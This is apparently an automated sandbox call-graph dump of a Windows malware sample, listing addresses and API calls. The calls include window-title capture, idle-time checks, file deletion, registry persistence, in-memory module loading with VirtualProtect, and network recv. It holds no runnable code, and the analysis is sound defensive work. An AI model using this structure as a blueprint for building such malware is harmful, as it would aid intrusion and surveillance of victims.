52684 411c4a 52683->52684 52734 403b60 52684->52734 52687 401fbd 28 API calls 52688 411c6c 52687->52688 52689 401fbd 28 API calls 52688->52689 52690 411c7b 52689->52690 52737 41b1ce 52690->52737 52693 411d38 52900 401d8c 52693->52900 52694 401d64 28 API calls 52696 411ca0 52694->52696 52698 401fbd 28 API calls 52696->52698 52697 411d41 52699 401eea 26 API calls 52697->52699 52701 411ca8 52698->52701 52700 411d4a 52699->52700 52702 401eea 26 API calls 52700->52702 52703 401d64 28 API calls 52701->52703 52704 411d52 52702->52704 52705 411cb8 52703->52705 52704->52656 52706 401fbd 28 API calls 52705->52706 52707 411cc0 52706->52707 52708 401d64 28 API calls 52707->52708 52709 411cd0 52708->52709 52710 401fbd 28 API calls 52709->52710 52711 411cd8 52710->52711 52712 401d64 28 API calls 52711->52712 52713 411ce8 52712->52713 52714 401fbd 28 API calls 52713->52714 52715 411cf0 52714->52715 52716 401d64 28 API calls 52715->52716 52717 411d00 52716->52717 52718 401fbd 28 API calls 52717->52718 52719 411d08 52718->52719 52720 401d64 28 API calls 52719->52720 52721 411d1b 52720->52721 52722 401fbd 28 API calls 52721->52722 52723 411d23 52722->52723 52758 411d59 GetModuleFileNameW 52723->52758 52726 4047eb 98 API calls 52726->52693 53121 402c1a 52727->53121 52732 401ec9 52730->52732 52731 401ee4 CreateEventA CreateThread WaitForSingleObject CloseHandle 52731->52656 53134 414d2d 52731->53134 52732->52731 52733 402325 28 API calls 52732->52733 52733->52731 52906 403c30 52734->52906 52757 41b1e1 52737->52757 52738 41b251 52739 401eea 26 API calls 52738->52739 52740 41b283 52739->52740 52741 401eea 26 API calls 52740->52741 52744 41b28b 52741->52744 52742 41b253 52745 403b60 28 API calls 52742->52745 52743 403b60 28 API calls 52743->52757 52746 401eea 26 API calls 52744->52746 52747 41b25f 52745->52747 52750 411c84 52746->52750 52748 401eef 26 API calls 52747->52748 52751 41b268 52748->52751 52749 401eef 26 API calls 52749->52757 52750->52693 52750->52694 52752 401eea 26 API calls 52751->52752 52754 41b270 52752->52754 52753 401eea 26 API calls 52753->52757 52755 41c1b4 28 API calls 52754->52755 52755->52738 52757->52738 52757->52742 52757->52743 52757->52749 52757->52753 52922 41c1b4 52757->52922 52770 411d84 52758->52770 52759 41ad43 42 API calls 52759->52770 52760 40c854 32 API calls 52760->52770 52761 401eea 26 API calls 52761->52770 52762 403b40 28 API calls 52762->52770 52763 403cbb 28 API calls 52763->52770 52764 403cdc 28 API calls 52764->52770 52765 411ec2 Sleep 52765->52770 52766 4028cf 28 API calls 52766->52770 52767 41789c 31 API calls 52767->52770 52768 411f64 Sleep 52768->52770 52769 401e13 26 API calls 52769->52770 52770->52759 52770->52760 52770->52761 52770->52762 52770->52763 52770->52764 52770->52765 52770->52766 52770->52767 52770->52768 52770->52769 52771 412006 Sleep 52770->52771 52772 412068 DeleteFileW 52770->52772 52773 41b825 32 API calls 52770->52773 52774 41209f DeleteFileW 52770->52774 52775 4120f1 Sleep 52770->52775 52776 4120db DeleteFileW 52770->52776 52777 41216a 52770->52777 52784 412136 Sleep 52770->52784 52771->52770 52772->52770 52773->52770 52774->52770 52775->52770 52776->52770 52778 401e13 26 API calls 52777->52778 52779 412176 52778->52779 52780 401e13 26 API calls 52779->52780 52781 412182 52780->52781 52782 401e13 26 API calls 52781->52782 52783 41218e 52782->52783 52956 40b027 52783->52956 52786 401e13 26 API calls 52784->52786 52791 412146 52786->52791 52787 4121a1 52788 401fbd 28 API calls 52787->52788 52790 4121c1 52788->52790 52789 401e13 26 API calls 52789->52791 52960 4124cf 52790->52960 52791->52770 52791->52789 52793 412168 52791->52793 52793->52783 52796 4121d8 52797 4121fd 52796->52797 52798 41234c 52796->52798 52976 41b0d3 52797->52976 52800 41b0d3 28 API calls 52798->52800 52801 412355 52800->52801 52803 4027ec 28 API calls 52801->52803 52805 41238a 52803->52805 52807 4027cb 28 API calls 52805->52807 52809 412399 52807->52809 52808 4027ec 28 API calls 52810 41224e 52808->52810 52811 4027cb 28 API calls 52809->52811 52812 4027cb 28 API calls 52810->52812 52813 4123a5 52811->52813 52814 41225d 52812->52814 52815 4027cb 28 API calls 52813->52815 52816 4027cb 28 API calls 52814->52816 52817 4123b4 52815->52817 52818 41226c 52816->52818 52819 4027cb 28 API calls 52817->52819 52820 4027cb 28 API calls 52818->52820 52821 4123c3 52819->52821 52822 41227b 52820->52822 52823 4027cb 28 API calls 52821->52823 52824 4027cb 28 API calls 52822->52824 52825 4123d2 52823->52825 52826 41228a 52824->52826 52827 4027cb 28 API calls 52825->52827 52828 4027cb 28 API calls 52826->52828 52829 4123e1 52827->52829 52830 412296 52828->52830 52987 40275c 28 API calls 52829->52987 52831 4027cb 28 API calls 52830->52831 52834 4122a2 52831->52834 52833 4123eb 52835 404468 60 API calls 52833->52835 52985 40275c 28 API calls 52834->52985 52837 4123f8 52835->52837 52839 401eea 26 API calls 52837->52839 52838 4122b1 52840 4027cb 28 API calls 52838->52840 52841 412404 52839->52841 52842 4122bd 52840->52842 52843 401eea 26 API calls 52841->52843 52986 40275c 28 API calls 52842->52986 52845 412410 52843->52845 52847 401eea 26 API calls 52845->52847 52846 4122c7 52848 404468 60 API calls 52846->52848 52849 41241c 52847->52849 52850 4122d4 52848->52850 52851 401eea 26 API calls 52849->52851 52852 401eea 26 API calls 52850->52852 52853 412428 52851->52853 52854 4122dd 52852->52854 52855 401eea 26 API calls 52853->52855 52856 401eea 26 API calls 52854->52856 52857 412431 52855->52857 52858 4122e6 52856->52858 52859 401eea 26 API calls 52857->52859 52860 401eea 26 API calls 52858->52860 52861 41243a 52859->52861 52862 4122ef 52860->52862 52864 401eea 26 API calls 52861->52864 52863 401eea 26 API calls 52862->52863 52866 4122f8 52863->52866 52865 412340 52864->52865 52868 401eea 26 API calls 52865->52868 52867 401eea 26 API calls 52866->52867 52869 412304 52867->52869 52870 41244c 52868->52870 52871 401eea 26 API calls 52869->52871 52872 401e13 26 API calls 52870->52872 52873 412310 52871->52873 52874 412458 52872->52874 52875 401eea 26 API calls 52873->52875 52876 401eea 26 API calls 52874->52876 52877 41231c 52875->52877 52878 412464 52876->52878 52879 401eea 26 API calls 52877->52879 52880 401eea 26 API calls 52878->52880 52881 412328 52879->52881 52882 412470 52880->52882 52883 401eea 26 API calls 52881->52883 52884 401eea 26 API calls 52882->52884 52885 412334 52883->52885 52886 41247c 52884->52886 52887 401eea 26 API calls 52885->52887 52888 401eea 26 API calls 52886->52888 52887->52865 52889 412488 52888->52889 52890 401eea 26 API calls 52889->52890 52891 412494 52890->52891 52892 401eea 26 API calls 52891->52892 52893 4124a0 52892->52893 52894 401eea 26 API calls 52893->52894 52895 4124ac 52894->52895 52896 401eea 26 API calls 52895->52896 52897 4124b8 52896->52897 52898 401eea 26 API calls 52897->52898 52899 411d28 52898->52899 52899->52726 52901 40200a 52900->52901 52902 402654 26 API calls 52901->52902 52905 40203a 52901->52905 52903 40202b 52902->52903 53120 4026ba 26 API calls _Deallocate 52903->53120 52905->52697 52907 403c39 52906->52907 52910 403c59 52907->52910 52911 403c68 52910->52911 52916 4032a4 52911->52916 52913 403c74 52914 402325 28 API calls 52913->52914 52915 403b73 52914->52915 52915->52687 52917 4032b0 52916->52917 52918 4032ad 52916->52918 52921 4032b6 28 API calls 52917->52921 52918->52913 52923 41c1b9 52922->52923 52924 41c1d6 52923->52924 52926 41c1dd 52923->52926 52948 41c1ee 28 API calls 52924->52948 52929 41c75d 52926->52929 52927 41c1db 52927->52757 52930 41c767 __EH_prolog 52929->52930 52931 41c87e 52930->52931 52933 41c7a0 52930->52933 52955 402649 28 API calls std::_Xinvalid_argument 52931->52955 52949 4026a7 28 API calls 52933->52949 52936 41c7b4 52950 41c741 28 API calls 52936->52950 52938 41c7e7 52939 41c802 52938->52939 52940 41c80e 52938->52940 52951 41c9bd 26 API calls 52939->52951 52952 41c9da 26 API calls 52940->52952 52943 41c80c 52954 41c965 26 API calls 52943->52954 52944 41c81a 52953 41c9da 26 API calls 52944->52953 52947 41c849 52947->52927 52948->52927 52949->52936 52950->52938 52951->52943 52952->52944 52953->52943 52954->52947 52957 40b02f 52956->52957 52988 40b04b 52957->52988 52959 40b045 52959->52787 52961 41250d 52960->52961 52963 4124de 52960->52963 52962 41251c 52961->52962 53000 10001c5b 52961->53000 52996 403b40 52962->52996 52993 410be5 52963->52993 52967 401eea 26 API calls 52969 4121cc 52967->52969 52972 401e13 52969->52972 52973 402121 52972->52973 52974 402150 52973->52974 53107 402718 26 API calls _Deallocate 52973->53107 52974->52796 52977 41b0e0 52976->52977 52978 401f86 28 API calls 52977->52978 52979 412209 52978->52979 52980 41af51 52979->52980 53108 440e5e 52980->53108 52983 401f66 28 API calls 52984 41221e 52983->52984 52984->52808 52985->52838 52986->52846 52987->52833 52989 40b055 52988->52989 52991 40b060 52989->52991 52992 40b138 28 API calls 52989->52992 52991->52959 52992->52991 53005 410bf1 52993->53005 52997 403b48 52996->52997 53056 403b7a 52997->53056 53001 10001c6b ___scrt_fastfail 53000->53001 53065 100012ee 53001->53065 53003 10001c87 53003->52962 53004 410e65 28 API calls ___std_exception_copy 53004->52961 53036 410691 53005->53036 53007 410c10 53008 410bed 53007->53008 53009 410691 SetLastError 53007->53009 53023 410cf7 SetLastError 53007->53023 53008->53004 53012 410c37 53009->53012 53011 410c97 GetNativeSystemInfo 53013 410cae 53011->53013 53012->53008 53012->53011 53012->53012 53012->53023 53013->53023 53039 410b96 VirtualAlloc 53013->53039 53015 410cd6 53016 410cfe GetProcessHeap HeapAlloc 53015->53016 53049 410b96 VirtualAlloc 53015->53049 53018 410d15 53016->53018 53019 410d27 53016->53019 53050 410bad VirtualFree 53018->53050 53022 410691 SetLastError 53019->53022 53020 410cee 53020->53016 53020->53023 53024 410d70 53022->53024 53023->53008 53025 410e1d 53024->53025 53040 410b96 VirtualAlloc 53024->53040 53051 410f88 GetProcessHeap HeapFree 53025->53051 53028 410d89 ctype 53041 4106a4 SetLastError ctype ___scrt_fastfail 53028->53041 53030 410db5 53030->53025 53042 410a4d SetLastError SetLastError 53030->53042 53032 410ddc 53032->53025 53043 410841 53032->53043 53034 410de7 53034->53008 53034->53025 53035 410e12 SetLastError 53034->53035 53035->53025 53037 4106a0 53036->53037 53038 410695 SetLastError 53036->53038 53037->53007 53038->53007 53039->53015 53040->53028 53041->53030 53042->53032 53047 410868 53043->53047 53044 410957 53045 4107ab VirtualProtect 53044->53045 53046 410969 53045->53046 53046->53034 53047->53044 53047->53046 53052 4107ab 53047->53052 53049->53020 53050->53023 53051->53008 53053 4107b5 53052->53053 53055 4107c0 53052->53055 53054 4107fa VirtualProtect 53053->53054 53053->53055 53054->53055 53055->53047 53057 403b86 53056->53057 53060 403b9e 53057->53060 53059 403b5a 53059->52967 53061 403ba8 53060->53061 53063 403bb3 53061->53063 53064 403cfd 28 API calls 53061->53064 53063->53059 53064->53063 53066 10001324 ___scrt_fastfail 53065->53066 53067 100013b7 GetEnvironmentVariableW 53066->53067 53091 100010f1 53067->53091 53070 100010f1 57 API calls 53071 10001465 53070->53071 53072 100010f1 57 API calls 53071->53072 53073 10001479 53072->53073 53074 100010f1 57 API calls 53073->53074 53075 1000148d 53074->53075 53076 100010f1 57 API calls 53075->53076 53077 100014a1 53076->53077 53078 100010f1 57 API calls 53077->53078 53079 100014b5 lstrlenW 53078->53079 53080 100014d9 lstrlenW 53079->53080 53081 100014d2 53079->53081 53082 100010f1 57 API calls 53080->53082 53081->53003 53083 10001501 lstrlenW lstrcatW 53082->53083 53084 100010f1 57 API calls 53083->53084 53085 10001539 lstrlenW lstrcatW 53084->53085 53086 100010f1 57 API calls 53085->53086 53087 1000156b lstrlenW lstrcatW 53086->53087 53088 100010f1 57 API calls 53087->53088 53089 1000159d lstrlenW lstrcatW 53088->53089 53090 100010f1 57 API calls 53089->53090 53090->53081 53092 10001118 ___scrt_fastfail 53091->53092 53093 10001129 lstrlenW 53092->53093 53104 10002c40 53093->53104 53095 10001148 lstrcatW lstrlenW 53096 10001177 lstrlenW FindFirstFileW 53095->53096 53097 10001168 lstrlenW 53095->53097 53098 100011a0 53096->53098 53099 100011e1 53096->53099 53097->53096 53100 100011c7 FindNextFileW 53098->53100 53101 100011aa 53098->53101 53099->53070 53100->53098 53102 100011da FindClose 53100->53102 53101->53100 53106 10001000 57 API calls ___scrt_fastfail 53101->53106 53102->53099 53105 10002c57 53104->53105 53105->53095 53105->53105 53106->53101 53107->52974 53109 440e6a 53108->53109 53112 440c5a 53109->53112 53113 440c71 53112->53113 53117 41af72 53113->53117 53118 445564 20 API calls _abort 53113->53118 53115 440ca8 53119 43aa37 26 API calls _Deallocate 53115->53119 53117->52983 53118->53115 53119->53117 53120->52905 53124 403340 53121->53124 53126 403348 53124->53126 53125 402662 53125->52656 53126->53125 53128 4038c2 53126->53128 53131 4038cb 53128->53131 53132 401eea 26 API calls 53131->53132 53133 4038ca 53132->53133 53133->53126 53135 401fbd 28 API calls 53134->53135 53136 414d4f SetEvent 53135->53136 53137 414d64 53136->53137 53138 403b60 28 API calls 53137->53138 53139 414d7e 53138->53139 53140 401fbd 28 API calls 53139->53140 53141 414d8e 53140->53141 53142 401fbd 28 API calls 53141->53142 53143 414da0 53142->53143 53144 41b1ce 28 API calls 53143->53144 53145 414da9 53144->53145 53147 414dc9 GetTickCount 53145->53147 53205 414f2b 53145->53205 53211 414f1c 53145->53211 53146 401d8c 26 API calls 53148 4163d6 53146->53148 53149 41af51 28 API calls 53147->53149 53150 401eea 26 API calls 53148->53150 53151 414ddf 53149->53151 53153 4163e2 53150->53153 53213 41aeab GetLastInputInfo GetTickCount 53151->53213 53155 401eea 26 API calls 53153->53155 53157 4163ee 53155->53157 53156 414de6 53158 41af51 28 API calls 53156->53158 53159 414df1 53158->53159 53214 41ae5d 53159->53214 53162 41b0d3 28 API calls 53163 414e0d 53162->53163 53164 401d64 28 API calls 53163->53164 53165 414e1b 53164->53165 53166 4027ec 28 API calls 53165->53166 53167 414e29 53166->53167 53219 40275c 28 API calls 53167->53219 53169 414e38 53170 4027cb 28 API calls 53169->53170 53171 414e47 53170->53171 53220 40275c 28 API calls 53171->53220 53173 414e56 53174 4027cb 28 API calls 53173->53174 53175 414e62 53174->53175 53221 40275c 28 API calls 53175->53221 53177 414e6c 53178 404468 60 API calls 53177->53178 53179 414e7b 53178->53179 53180 401eea 26 API calls 53179->53180 53181 414e84 53180->53181 53182 401eea 26 API calls 53181->53182 53183 414e90 53182->53183 53184 401eea 26 API calls 53183->53184 53185 414e9c 53184->53185 53186 401eea 26 API calls 53185->53186 53187 414ea8 53186->53187 53188 401eea 26 API calls 53187->53188 53189 414eb4 53188->53189 53190 401eea 26 API calls 53189->53190 53191 414ec0 53190->53191 53192 401e13 26 API calls 53191->53192 53193 414ecc 53192->53193 53194 401eea 26 API calls 53193->53194 53195 414ed5 53194->53195 53196 401eea 26 API calls 53195->53196 53197 414ede 53196->53197 53198 401d64 28 API calls 53197->53198 53199 414ee9 53198->53199 53222 43a7f7 53199->53222 53202 414f21 53204 401d64 28 API calls 53202->53204 53203 414efb 53206 414f14 53203->53206 53207 414f09 53203->53207 53204->53205 53205->53211 53212 414f3f 53205->53212 53227 404915 53206->53227 53226 4049ba 81 API calls 53207->53226 53210 414f0f 53210->53211 53211->53146 53242 404ab1 83 API calls 53212->53242 53213->53156 53243 436260 53214->53243 53217 403b40 28 API calls 53218 414dff 53217->53218 53218->53162 53219->53169 53220->53173 53221->53177 53223 43a810 _swprintf 53222->53223 53245 439b4e 53223->53245 53226->53210 53228 4049b1 53227->53228 53229 40492a 53227->53229 53228->53211 53230 404933 53229->53230 53231 404987 CreateEventA CreateThread 53229->53231 53232 404942 GetLocalTime 53229->53232 53230->53231 53231->53228 53280 404b1d 53231->53280 53233 41af51 28 API calls 53232->53233 53234 40495b 53233->53234 53279 404c9e 28 API calls 53234->53279 53236 404968 53237 401f66 28 API calls 53236->53237 53238 404977 53237->53238 53239 41a891 79 API calls 53238->53239 53240 40497c 53239->53240 53241 401eea 26 API calls 53240->53241 53241->53231 53242->53210 53244 41ae7c GetForegroundWindow GetWindowTextW 53243->53244 53244->53217 53263 43a755 53245->53263 53247 439b9b 53272 4394ee 38 API calls 2 library calls 53247->53272 53248 439b60 53248->53247 53249 439b75 53248->53249 53262 414ef6 53248->53262 53270 445564 20 API calls _abort 53249->53270 53252 439b7a 53271 43aa37 26 API calls _Deallocate 53252->53271 53255 439ba7 53256 439bd6 53255->53256 53273 43a79a 42 API calls __Tolower 53255->53273 53259 439c42 53256->53259 53274 43a701 26 API calls 2 library calls 53256->53274 53275 43a701 26 API calls 2 library calls 53259->53275 53260 439d09 _swprintf 53260->53262 53276 445564 20 API calls _abort 53260->53276 53262->53202 53262->53203 53264 43a75a 53263->53264 53265 43a76d 53263->53265 53277 445564 20 API calls _abort 53264->53277 53265->53248 53267 43a75f 53278 43aa37 26 API calls _Deallocate 53267->53278 53269 43a76a 53269->53248 53270->53252 53271->53262 53272->53255 53273->53255 53274->53259 53275->53260 53276->53262 53277->53267 53278->53269 53279->53236 53283 404b29 101 API calls 53280->53283 53282 404b26 53283->53282 53284->52671 53285->52676 53286->52678 53287 1000c7a7 53288 1000c7be 53287->53288 53293 1000c82c 53287->53293 53288->53293 53299 1000c7e6 GetModuleHandleA 53288->53299 53290 1000c872 53291 1000c835 GetModuleHandleA 53294 1000c83f 53291->53294 53292 1000c7dd 53292->53293 53292->53294 53296 1000c800 GetProcAddress 53292->53296 53293->53290 53293->53291 53293->53294 53294->53293 53295 1000c85f GetProcAddress 53294->53295 53295->53293 53296->53293 53297 1000c80d VirtualProtect 53296->53297 53297->53293 53298 1000c81c VirtualProtect 53297->53298 53298->53293 53300 1000c7ef 53299->53300 53307 1000c82c 53299->53307 53311 1000c803 GetProcAddress 53300->53311 53302 1000c7f4 53305 1000c800 GetProcAddress 53302->53305 53302->53307 53303 1000c872 53304 1000c835 GetModuleHandleA 53309 1000c83f 53304->53309 53306 1000c80d VirtualProtect 53305->53306 53305->53307 53306->53307 53308 1000c81c VirtualProtect 53306->53308 53307->53303 53307->53304 53307->53309 53308->53307 53309->53307 53310 1000c85f GetProcAddress 53309->53310 53310->53307 53312 1000c82c 53311->53312 53313 1000c80d VirtualProtect 53311->53313 53315 1000c872 53312->53315 53316 1000c835 GetModuleHandleA 53312->53316 53313->53312 53314 1000c81c VirtualProtect 53313->53314 53314->53312 53318 1000c83f 53316->53318 53317 1000c85f GetProcAddress 53317->53318 53318->53312 53318->53317 53319 42623b 53324 426302 recv 53319->53324 53325 41d6db 53327 41d6f1 ctype ___scrt_fastfail 53325->53327 53326 41d8ee 53331 41d93f 53326->53331 53341 41d27c DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 53326->53341 53327->53326 53328 4321a4 21 API calls 53327->53328 53334 41d8a1 ___scrt_fastfail 53328->53334 53330 41d8ff 53330->53331 53332 41d96b 53330->53332 53333 4321a4 21 API calls 53330->53333 53332->53331 53345 41d67f 21 API calls ___scrt_fastfail 53332->53345 53337 41d938 ___scrt_fastfail 53333->53337 53334->53331 53335 4321a4 21 API calls 53334->53335 53339 41d8c9 ___scrt_fastfail 53335->53339 53337->53331 53342 43285a 53337->53342 53339->53331 53340 4321a4 21 API calls 53339->53340 53340->53326 53341->53330 53346 43277a 53342->53346 53344 432862 53344->53332 53345->53331 53347 432793 53346->53347 53351 432789 53346->53351 53348 4321a4 21 API calls 53347->53348 53347->53351 53349 4327b4 53348->53349 53349->53351 53352 432b45 CryptAcquireContextA 53349->53352 53351->53344 53353 432b61 53352->53353 53354 432b66 CryptGenRandom 53352->53354 53353->53351 53354->53353 53355 432b7b CryptReleaseContext 53354->53355 53355->53353 53356 433bc9 53357 433bd5 ___DestructExceptionObject 53356->53357 53388 4338be 53357->53388 53359 433bdc 53360 433d2f 53359->53360 53363 433c06 53359->53363 53690 433d4f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 53360->53690 53362 433d36 53691 4428ce 28 API calls _abort 53362->53691 53376 433c45 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 53363->53376 53684 4436e1 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 53363->53684 53365 433d3c 53692 442880 28 API calls _abort 53365->53692 53368 433c1f 53370 433c25 53368->53370 53685 443685 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 53368->53685 53369 433d44 53372 433ca6 53399 433e69 53372->53399 53376->53372 53686 43f037 38 API calls 3 library calls 53376->53686 53382 433cc8 53382->53362 53383 433ccc 53382->53383 53384 433cd5 53383->53384 53688 442871 28 API calls _abort 53383->53688 53689 433a4d 13 API calls 2 library calls 53384->53689 53387 433cdd 53387->53370 53389 4338c7 53388->53389 53693 434015 IsProcessorFeaturePresent 53389->53693 53391 4338d3 53694 437bfe 10 API calls 3 library calls 53391->53694 53393 4338d8 53394 4338dc 53393->53394 53695 44356e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53393->53695 53394->53359 53396 4338e5 53397 4338f3 53396->53397 53696 437c27 8 API calls 3 library calls 53396->53696 53397->53359 53400 436260 ___scrt_fastfail 53399->53400 53401 433e7c GetStartupInfoW 53400->53401 53402 433cac 53401->53402 53403 443632 53402->53403 53697 44dfd9 53403->53697 53405 44363b 53407 433cb5 53405->53407 53701 44e2e3 38 API calls 53405->53701 53408 40d83a 53407->53408 53703 41beee LoadLibraryA GetProcAddress 53408->53703 53410 40d856 GetModuleFileNameW 53708 40e240 53410->53708 53412 40d872 53413 401fbd 28 API calls 53412->53413 53414 40d881 53413->53414 53415 401fbd 28 API calls 53414->53415 53416 40d890 53415->53416 53417 41b1ce 28 API calls 53416->53417 53418 40d899 53417->53418 53723 40e995 53418->53723 53420 40d8a2 53421 401d8c 26 API calls 53420->53421 53422 40d8ab 53421->53422 53423 40d908 53422->53423 53424 40d8be 53422->53424 53425 401d64 28 API calls 53423->53425 53932 40ea5e 90 API calls 53424->53932 53427 40d918 53425->53427 53430 401d64 28 API calls 53427->53430 53428 40d8d0 53429 401d64 28 API calls 53428->53429 53433 40d8dc 53429->53433 53431 40d937 53430->53431 53432 404cbf 28 API calls 53431->53432 53434 40d946 53432->53434 53933 40ea0f 68 API calls 53433->53933 53436 405ce6 28 API calls 53434->53436 53438 40d952 53436->53438 53437 40d8f7 53934 40e22d 68 API calls 53437->53934 53439 401eef 26 API calls 53438->53439 53441 40d95e 53439->53441 53442 401eea 26 API calls 53441->53442 53443 40d967 53442->53443 53445 401eea 26 API calls 53443->53445 53444 401eea 26 API calls 53446 40dd72 53444->53446 53447 40d970 53445->53447 53687 433e9f GetModuleHandleW 53446->53687 53448 401d64 28 API calls 53447->53448 53449 40d979 53448->53449 53450 401ebd 28 API calls 53449->53450 53451 40d984 53450->53451 53452 401d64 28 API calls 53451->53452 53453 40d99d 53452->53453 53454 401d64 28 API calls 53453->53454 53455 40d9b8 53454->53455 53456 40da19 53455->53456 53935 4085b4 53455->53935 53457 401d64 28 API calls 53456->53457 53473 40e20c 53456->53473 53462 40da30 53457->53462 53459 40d9e5 53460 401eef 26 API calls 53459->53460 53461 40d9f1 53460->53461 53464 401eea 26 API calls 53461->53464 53463 40da77 53462->53463 53469 41258f 3 API calls 53462->53469 53727 40bed7 53463->53727 53465 40d9fa 53464->53465 53939 41258f RegOpenKeyExA 53465->53939 53467 40da7d 53468 40d900 53467->53468 53730 41a66e 53467->53730 53468->53444 53474 40da5b 53469->53474 53472 40da98 53475 40daeb 53472->53475 53747 40697b 53472->53747 54027 4129da 30 API calls 53473->54027 53474->53463 53942 4129da 30 API calls 53474->53942 53478 401d64 28 API calls 53475->53478 53481 40daf4 53478->53481 53480 40e222 54028 41138d 64 API calls ___scrt_fastfail 53480->54028 53489 40db00 53481->53489 53490 40db05 53481->53490 53484 40dac1 53488 401d64 28 API calls 53484->53488 53485 40dab7 53943 40699d 30 API calls 53485->53943 53497 40daca 53488->53497 53946 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 53489->53946 53494 401d64 28 API calls 53490->53494 53491 40dabc 53944 4064d0 97 API calls 53491->53944 53495 40db0e 53494->53495 53751 41b013 53495->53751 53497->53475 53500 40dae6 53497->53500 53498 40db19 53755 401e18 53498->53755 53945 4064d0 97 API calls 53500->53945 53501 40db24 53503 401e13 26 API calls 53501->53503 53504 40db2d 53503->53504 53505 401d64 28 API calls 53504->53505 53506 40db36 53505->53506 53507 401d64 28 API calls 53506->53507 53508 40db50 53507->53508 53509 401d64 28 API calls 53508->53509 53510 40db6a 53509->53510 53511 401d64 28 API calls 53510->53511 53513 40db83 53511->53513 53512 40dbf0 53514 40dbff 53512->53514 53521 40dd7d ___scrt_fastfail 53512->53521 53513->53512 53515 401d64 28 API calls 53513->53515 53516 40dc08 53514->53516 53544 40dc84 ___scrt_fastfail 53514->53544 53519 40db98 _wcslen 53515->53519 53517 401d64 28 API calls 53516->53517 53518 40dc11 53517->53518 53520 401d64 28 API calls 53518->53520 53519->53512 53522 401d64 28 API calls 53519->53522 53523 40dc23 53520->53523 54006 412735 RegOpenKeyExA 53521->54006 53524 40dbb3 53522->53524 53526 401d64 28 API calls 53523->53526 53527 401d64 28 API calls 53524->53527 53528 40dc35 53526->53528 53529 40dbc8 53527->53529 53531 401d64 28 API calls 53528->53531 53947 40c89e 53529->53947 53530 40ddc2 53532 401d64 28 API calls 53530->53532 53533 40dc5e 53531->53533 53534 40dde9 53532->53534 53538 401d64 28 API calls 53533->53538 53539 401f66 28 API calls 53534->53539 53537 401e18 26 API calls 53540 40dbe7 53537->53540 53542 40dc6f 53538->53542 53543 40ddf8 53539->53543 53541 401e13 26 API calls 53540->53541 53541->53512 54004 40bc67 46 API calls _wcslen 53542->54004 53769 4127aa RegCreateKeyA 53543->53769 53759 41297a 53544->53759 53548 40dd18 53553 401d64 28 API calls 53548->53553 53549 40dc7f 53549->53544 53551 401d64 28 API calls 53552 40de1a 53551->53552 53555 43a7f7 42 API calls 53552->53555 53554 40dd2f 53553->53554 53554->53530 53558 40dd43 53554->53558 53556 40de27 53555->53556 53557 40de31 53556->53557 53559 40de54 53556->53559 54009 41c0bb 87 API calls ___scrt_fastfail 53557->54009 53560 401d64 28 API calls 53558->53560 53564 401f66 28 API calls 53559->53564 53562 40dd51 53560->53562 53565 41b013 28 API calls 53562->53565 53563 40de38 CreateThread 53563->53559 54433 41cb7a 10 API calls 53563->54433 53566 40de69 53564->53566 53567 40dd5a 53565->53567 53569 401f66 28 API calls 53566->53569 54005 40e2f1 119 API calls 53567->54005 53570 40de78 53569->53570 53572 41a891 79 API calls 53570->53572 53571 40dd5f 53571->53530 53573 40dd66 53571->53573 53574 40de7d 53572->53574 53573->53468 53575 401d64 28 API calls 53574->53575 53576 40de89 53575->53576 53577 401d64 28 API calls 53576->53577 53578 40de9e 53577->53578 53579 401d64 28 API calls 53578->53579 53580 40debe 53579->53580 53581 43a7f7 42 API calls 53580->53581 53582 40decb 53581->53582 53583 401d64 28 API calls 53582->53583 53584 40ded6 53583->53584 53585 401d64 28 API calls 53584->53585 53586 40dee7 53585->53586 53587 401d64 28 API calls 53586->53587 53588 40defc 53587->53588 53589 401d64 28 API calls 53588->53589 53590 40df0d 53589->53590 53591 40df14 StrToIntA 53590->53591 53775 409517 53591->53775 53594 401d64 28 API calls 53595 40df2f 53594->53595 53596 40df74 53595->53596 53597 40df3b 53595->53597 53599 401d64 28 API calls 53596->53599 54010 433818 22 API calls 3 library calls 53597->54010 53601 40df84 53599->53601 53600 40df44 53602 401d64 28 API calls 53600->53602 53604 40df90 53601->53604 53605 40dfcc 53601->53605 53603 40df57 53602->53603 53606 40df5e CreateThread 53603->53606 54011 433818 22 API calls 3 library calls 53604->54011 53608 401d64 28 API calls 53605->53608 53606->53596 54431 41931e 112 API calls __EH_prolog 53606->54431 53610 40dfd5 53608->53610 53609 40df99 53611 401d64 28 API calls 53609->53611 53613 40dfe1 53610->53613 53614 40e03f 53610->53614 53612 40dfab 53611->53612 53617 40dfb2 CreateThread 53612->53617 53616 401d64 28 API calls 53613->53616 53615 401d64 28 API calls 53614->53615 53618 40e048 53615->53618 53619 40dff1 53616->53619 53617->53605 54430 41931e 112 API calls __EH_prolog 53617->54430 53620 40e054 53618->53620 53621 40e08d 53618->53621 53622 401d64 28 API calls 53619->53622 53624 401d64 28 API calls 53620->53624 53800 41a9ad GetComputerNameExW GetUserNameW 53621->53800 53625 40e006 53622->53625 53627 40e05d 53624->53627 54012 40c854 53625->54012 53632 401d64 28 API calls 53627->53632 53628 401e18 26 API calls 53629 40e0a1 53628->53629 53631 401e13 26 API calls 53629->53631 53634 40e0aa 53631->53634 53635 40e072 53632->53635 53637 40e0b3 SetProcessDEPPolicy 53634->53637 53638 40e0b6 CreateThread 53634->53638 53645 43a7f7 42 API calls 53635->53645 53636 401e18 26 API calls 53639 40e025 53636->53639 53637->53638 53640 40e0d7 53638->53640 53641 40e0cb CreateThread 53638->53641 54403 40e627 53638->54403 53642 401e13 26 API calls 53639->53642 53643 40e0e0 CreateThread 53640->53643 53644 40e0ec 53640->53644 53641->53640 54432 41100e 145 API calls 53641->54432 53646 40e02e CreateThread 53642->53646 53643->53644 54434 4115fc 38 API calls ___scrt_fastfail 53643->54434 53648 40e146 53644->53648 53650 401f66 28 API calls 53644->53650 53647 40e07f 53645->53647 53646->53614 54435 40196b 49 API calls 53646->54435 54023 40b95c 7 API calls 53647->54023 53811 412546 RegOpenKeyExA 53648->53811 53651 40e119 53650->53651 54024 404c9e 28 API calls 